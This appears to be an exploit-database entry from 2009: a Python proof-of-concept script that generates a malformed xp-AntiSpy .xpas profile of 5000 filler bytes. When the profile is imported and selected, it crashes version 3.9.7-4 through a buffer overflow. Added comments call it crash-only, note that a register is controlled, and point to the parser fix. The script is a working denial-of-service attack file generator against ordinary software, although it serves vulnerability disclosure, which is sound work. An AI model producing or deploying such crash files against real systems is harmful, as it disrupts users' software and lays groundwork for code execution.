# Title : xp-AntiSpy 3.9.7-4 xpas file BoF
# Published : 2009-10-26
# Author : Dr_IDE
#!/usr/bin/env python
######################################################################
#
# xp-AntiSpy <= 3.9.7-4 Local (.XPAS File) Local Buffer Overflow PoC
# Found By: Dr_IDE
# Tested On: XPSP3
# Notes:
# 1) The program does not check the imported data in any way.
# 2) If you import this profile and select it, the program will crash.
# 3) We get a hold of a register so execution may be possible?
#
######################################################################
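# Crash-only proof of concept: the generated profile is 5000 copies of one
# filler byte (0x41, "A"). It carries no payload; per the notes above, the
# importer does not validate profile data, so selecting the imported profile
# crashes the program. Whether the crash is exploitable is left open by the
# author.
#
# NOTE(review): the root cause is in the application's profile parser, so the
# fix is there too (length/bounds checks on imported fields). Until patched,
# treat .xpas profiles from untrusted sources like any other untrusted input.
#
# The backslash escapes (\x41, \n) were lost when the page was extracted and
# are restored here; the block indentation was lost as well.
buff = "\x41" * 5000
sploit = buff

print("\n\n#############################################################")
print("# xp-AntiSpy <= 3.9.7-4 Local (.XPAS File) Local DoS Exploit")
print("# By: Dr_IDE")
print("# pocoftheday.blogspot.com")
print("#############################################################\n")
print("[*] Writing evil .XPAS profile file.")

try:
    # The context manager closes the handle even if write() fails part-way.
    with open("Dr_IDEs_Evil_Profile.xpas", "w") as f1:
        f1.write(sploit)
except (IOError, OSError):
    # Only file-system failures are reported as a write error; the original
    # bare "except:" also hid unrelated errors and Ctrl-C.
    print("[-] Error, could not write the file.")
else:
    print('[*] Success. Import File and Click "File -> Evil Profile".')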
#[pocoftheday.blogspot.com]